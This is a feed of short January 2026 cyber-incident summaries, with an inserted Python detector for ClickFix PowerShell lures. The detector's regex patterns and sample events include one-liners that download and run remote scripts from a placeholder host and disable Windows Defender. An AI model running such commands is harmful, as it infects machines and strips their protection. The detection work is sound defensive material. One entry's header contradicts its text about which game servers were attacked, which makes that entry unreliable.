Cressi
January 8, 2026
•[ ransomware, data leak, leak site ]
Cybernews reported that the ransomware group Qilin claimed responsibility for an attack on Cressi, an Italian diving equipment manufacturer, by posting a ransom entry on its leak site on January 8, 2026. The report notes that at that stage it was unclear what data (if any) had been accessed or exfiltrated and that the group had not published data samples or set a countdown timer. As reported, the main confirmed indicator is the group's claim and listing on the leak site; independent confirmation of encryption, downtime, or data theft was not provided in the article.
At least one Telecom company in South Asia
January 8, 2026
•[ espionage, malware, threat intelligence ]
The Hacker News summarized Cisco Talos research attributing espionage-focused intrusions to a China-nexus actor tracked as UAT-7290. The campaign reportedly targets telecom entities in South Asia and Southeastern Europe, performing extensive reconnaissance followed by compromise activity that can lead to deployment of malware families including RushDrop, DriveSwitch, and SilentRaid. The article is threat-intelligence reporting focused on actor behavior, tooling, and geographic targeting, and it does not provide a bounded, single victim incident record with confirmed impact metrics (e.g., downtime or specific data stolen) for one named organization.
Truebit
January 8, 2026
•[ cryptocurrency theft, smart contract exploit, blockchain security ]
The Record reported that hackers stole more than $26 million in cryptocurrency from the Truebit platform on Thursday (January 8, 2026). Truebit said it became aware of a security incident involving one or more malicious actors and urged users not to interact with the affected smart contract. Blockchain security firms tracked 8,535 ETH taken (reported as about $26.44 million). The report frames the event as a major early-2026 crypto theft affecting Truebit's on-chain assets, with ongoing law-enforcement contact and incident response actions mentioned, but without detailing the precise exploit mechanism in the article text provided.
Instagram
January 7, 2026
•[ data leak, scraping ]
In January 2026, data allegedly scraped via an Instagram API was posted to a popular hacking forum. The dataset contained 17M rows of public Instagram information, including usernames, display names, account IDs, and in some cases, geolocation data. Of these records, 6.2M included an associated email address, and some also contained a phone number. The scraped data appears to be unrelated to password reset requests initiated on the platform, despite coinciding in timeframe. There is no evidence that passwords or other sensitive data were compromised.
Panera Bread
January 7, 2026
•[ ransomware, data leak ]
In January 2026, Panera Bread suffered a data breach that exposed 14M records. After an attempted extortion failed, the attackers published the data publicly, which included 5.1M unique email addresses along with associated account information such as names, phone numbers and physical addresses. Panera Bread subsequently confirmed that "the data involved is contact information" and that authorities were notified.
Universidad Nacional Autónoma de México
January 7, 2026
•[ unauthorized intrusion, incident response, system downtime ]
Universidad Nacional Autónoma de México confirmed an unauthorized intrusion into a small number of its information systems in early January 2026. The university stated that five systems were affected and temporarily taken offline as a precautionary measure, that incident response protocols were activated, and that there was no evidence of theft or extraction of personal data belonging to students, faculty, or staff at the time of reporting.
Metro Pet Vet
January 7, 2026
•[ ransomware, data breach, technical difficulties ]
A Lancaster County veterinary practice (Metro Pet Vet) reported it was hit by a ransomware attack after several days of technical issues. The office said that on Monday and Tuesday it experienced major technical difficulties, including its router going down, and that by Wednesday morning ransomware was detected and the practice lost access to its server. Staff reported they could not access pet vaccine and medication histories and had to operate "like 40 years ago" using paper while continuing to treat animals and relying on an app for scheduling. The practice stated no credit card or Social Security information was stored on the affected server, but client phone numbers and addresses were stored there, and it expected recovery work to continue into the following week.
Veenkoloniaal Museum (Veendam)
January 7, 2026
•[ ransomware, unauthorized access, data theft ]
The Veenkoloniaal Museum in Veendam experienced a ransomware incident discovered on January 7, 2026, in which the LockBit group gained unauthorized access to systems. Data was stolen and files were rendered inaccessible, affecting digital records and image archives. Individuals whose personal data was involved were notified. The museum restored systems from backups and declined to negotiate with the attackers.
Anchorage Police Department via Whitebox Technologies
January 7, 2026
•[ security incident, third-party risk, data migration ]
Anchorage Police Department reported it took immediate containment actions after being alerted on January 7, 2026 to a security incident affecting one of its technology service providers, Whitebox Technologies (a data migration firm). According to reporting cited in the post, the City's IT department shut down the relevant Anchorage Police Department servers and disabled the vendor's access along with all third-party service provider access while incident response work continued. As of the report date, no ransomware group had publicly claimed responsibility and there was no public statement from the vendor. Public reporting did not confirm whether any APD data was accessed or exfiltrated, but it confirms operational disruption via server shutdown and access suspension.
Global-e
January 7, 2026
•[ data exposure, third-party compromise, unauthorized access ]
Reporting aggregated by DataBreaches.Net indicates Ledger was impacted by a data exposure incident involving its third-party payment processor, Global-e. The report describes an email notification stating that an unauthorized party accessed Global-e's cloud system and obtained Ledger customers' personal details, including names and contact information associated with orders. The notification did not specify when the access occurred, how many Ledger customers were affected, or whether additional data types (e.g., payment details) were involved. The incident is treated as a third-party compromise affecting Ledger customer data.
Iberia Airlines
January 7, 2026
•[ infostealer, malware, credential theft ]
TechRadar and HackRead summarized Hudson Rock research describing a campaign in which an actor using the alias Zestix (aka Sentap) leveraged credentials harvested by infostealer malware (e.g., RedLine, Lumma, Vidar) to access corporate cloud instances where multi-factor authentication was not enforced. Reporting stated the attacker obtained and attempted to auction or sell large volumes of sensitive corporate files from roughly 50 enterprises worldwide, with at least one victim reportedly losing on the order of 139GB of data. Specific victim impacts vary by organization, and the timing of initial credential theft was not fully specified.
CRRC MA
January 7, 2026
•[ credential theft, information-stealer malware, initial access broker ]
Reporting summarizing Hudson Rock research described an initial access broker believed to be an Iranian national operating under the aliases Zestix and Sentap who repeatedly accessed enterprise file repositories using credentials harvested by information-stealer malware (including RedLine, Lumma, and Vidar). Instead of exploiting a single company-specific vulnerability, the actor leveraged stolen usernames/passwords (some sitting in logs for years) to log into cloud/file-transfer environments lacking multi-factor authentication. The actor was described as exfiltrating large volumes of sensitive corporate data (examples referenced include aviation safety manuals, energy/utility mapping and infrastructure files, and medical/police-related records), then auctioning datasets or selling access on closed forums. Because the article describes a cross-victim pattern/campaign rather than one named-victim incident, this record is coded at the campaign level for a single-actor series of breaches.
Higham Lane School
January 7, 2026
•[ cyberattack, operational disruption, IT outage ]
Cybernews reported that Higham Lane School, a secondary school in Nuneaton, England, temporarily closed due to a cyberattack. According to the headteacher's message to parents cited in the article, the school took all IT systems and digital services completely offline as a precaution, including telephones, email, servers, and the school's management system. The report does not identify the threat actor, method of intrusion, or whether data was accessed; the primary confirmed impact is operational disruption and loss of communications/management systems while the school responded.
At least one Booking.com user
January 7, 2026
•[ phishing, social engineering, malware ]
Research summarized by Cybernews described a ClickFix social-engineering campaign abusing Booking.com branding. Victims receive phishing emails about a cancelled reservation and a large charge; clicking through leads to a fake Booking.com page with a fake refresh flow and a simulated Blue Screen of Death. The page instructs the user to paste and run a malicious PowerShell command via the Windows Run dialog; the command fetches and executes remote code, disables Windows Defender, and establishes persistence with C2 connectivity. The link is campaign/threat-intel reporting and does not provide a single confirmed victim organization or a bounded incident count, but it describes successful infections driven by user-executed commands.
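Because the ClickFix chain above depends on the victim typing a PowerShell one-liner into Win+R, the most direct detection point is process-creation telemetry. The following is an added illustration, not code from the report or from any vendor: a heuristic scorer over constructed process events that weights the traits the campaign description names (hidden window, remote fetch-and-execute, Defender tampering, persistence) and that also decodes `-EncodedCommand` payloads before scoring, since ClickFix lures commonly hide the stage-2 fetch that way. The indicator weights, the alert threshold, and the sample command lines are assumptions for illustration; the `example.invalid` hostname is a placeholder.

```python
"""Heuristic ClickFix detector over process-creation events (added example).

Scores PowerShell command lines for the traits described in the campaign
write-up. Weights, threshold and sample events are constructed assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

THRESHOLD = 5  # assumed alert threshold for illustration

# (name, pattern, weight). Weights are illustrative, not tuned values.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("remote_fetch", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient)\b",
        re.I), 3),
    ("exec_download", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("defender_off", re.compile(r"set-mppreference.*-disable\w*", re.I), 4),
    ("persistence", re.compile(
        r"\b(?:schtasks|new-scheduledtask|currentversion\\run|register-scheduledjob)\b",
        re.I), 3),
    ("bypass_policy", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2),
    ("encoded_cmd", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
]

_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


@dataclass
class ProcessEvent:
    parent_image: str   # e.g. explorer.exe: the Run dialog launches under Explorer
    image: str
    command_line: str


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand payload (base64 of UTF-16LE), if any."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(command_line: str) -> Tuple[int, List[str]]:
    """Return (score, matched indicator names); decoded payloads are scanned too."""
    text = command_line
    decoded = decode_encoded_command(command_line)
    if decoded:
        text = command_line + " " + decoded
    score, hits = 0, []
    for name, rx, weight in INDICATORS:
        if rx.search(text):
            score += weight
            hits.append(name)
    return score, hits


def is_clickfix_candidate(ev: ProcessEvent) -> bool:
    """Flag PowerShell launches whose command line scores at or above THRESHOLD."""
    if ev.image.lower() not in ("powershell.exe", "pwsh.exe"):
        return False
    score, _ = score_command(ev.command_line)
    # The lure has the victim paste into Win+R, which spawns under explorer.exe,
    # so an Explorer parent nudges the score (assumed weight of 1).
    if ev.parent_image.lower() == "explorer.exe":
        score += 1
    return score >= THRESHOLD


# Constructed sample telemetry (not real events). STAGE2 stands in for the
# remote fetch a ClickFix lure hides inside an encoded command.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/fix.ps1); '
                 'Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcessEvent("cmd.exe", "powershell.exe",
                 'powershell -NoProfile -Command "Get-Process | Sort-Object CPU"'),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell -nop -w hidden -enc " + ENCODED),
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -Command "Get-ChildItem $env:USERPROFILE\\Documents"'),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, hits = score_command(ev.command_line)
        flag = "ALERT" if is_clickfix_candidate(ev) else "ok"
        print(f"{flag:5} score={score:2} hits={hits} parent={ev.parent_image}")
```

The scorer is deliberately additive rather than a single signature: any one trait (a hidden window, an execution-policy bypass) is common in legitimate administration, but the combination of a remote fetch, an in-memory execute and Defender tampering from an Explorer-spawned shell is the ClickFix shape. Rescanning the decoded `-enc` payload matters because the plaintext command line of such lures often shows nothing but the hidden-window flag.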
40 Danish websites (ministries, municipalities, businesses; incl. Ministry of Foreign Affairs and Rejsekort named in reporting)
January 7, 2026
•[ DDoS, Russian hacker groups, politically motivated disruption ]
Reporting cited by Denmark's CPH Post said Russian hacker groups carried out DDoS attacks over the prior month against around 40 Danish websites belonging to ministries, municipalities, and companies. The attacks aimed to overload systems and made several sites inaccessible for hours. The report referenced affected entities including Denmark's Ministry of Foreign Affairs and Rejsekort, consistent with politically motivated disruption rather than data theft.
OpenLoop Health
January 7, 2026
•[ data leak, unauthorized access, medical information ]
OpenLoop Health disclosed that an unauthorized third party accessed certain systems between January 7 and January 8, 2026 and removed files containing patient personal and medical information.
Final Fantasy 14's European or Asian servers
January 6, 2026
•[ DDoS attack, service disruption, distributed denial-of-service ]
Reporting described sustained distributed denial-of-service (DDoS) attacks disrupting Final Fantasy XIV's North American servers during the launch window for a newly released savage raid tier. Players reported frequent disconnects and unstable service during peak playtimes, and community tracking cited repeated incidents throughout the day, including reports of around 15 disruptions in a single day. The disruptions affected progression and organized play and persisted over multiple days.
NMCV Business LLC
January 6, 2026
•[ information-stealer malware, initial access broker, credential harvesting ]
SecurityWeek summarized Hudson Rock findings that dozens of major breaches were tied to a single initial access broker using credentials harvested by information-stealer malware (RedLine, Lumma, Vidar). The actor (Zestix/Sentap) was described as using stolen employee credentials to access enterprise file-transfer or file-sharing instances (ShareFile, OwnCloud, Nextcloud), with the lack of MFA being the key enabling control failure. The reporting characterized the actor as both stealing data and monetizing it by selling datasets and/or selling access on closed Russian-language forums, with victim organizations spanning aerospace, government infrastructure, legal, robotics, healthcare and other sectors.
Australian NBN
January 6, 2026
•[ initial access broker, information-stealer malware, RedLine ]
SecurityWeek summarized Hudson Rock findings that dozens of major breaches were tied to a single initial access broker using credentials harvested by information-stealer malware (RedLine, Lumma, Vidar). The actor (Zestix/Sentap) was described as using stolen employee credentials to access enterprise file-transfer or file-sharing instances (ShareFile, OwnCloud, Nextcloud), with the lack of MFA being the key enabling control failure. The reporting characterized the actor as both stealing data and monetizing it by selling datasets and/or selling access on closed Russian-language forums, with victim organizations spanning aerospace, government infrastructure, legal, robotics, healthcare and other sectors. Because the report is multi-victim and campaign-focused rather than a single victim's disclosure, this record is captured as a single-actor campaign entry.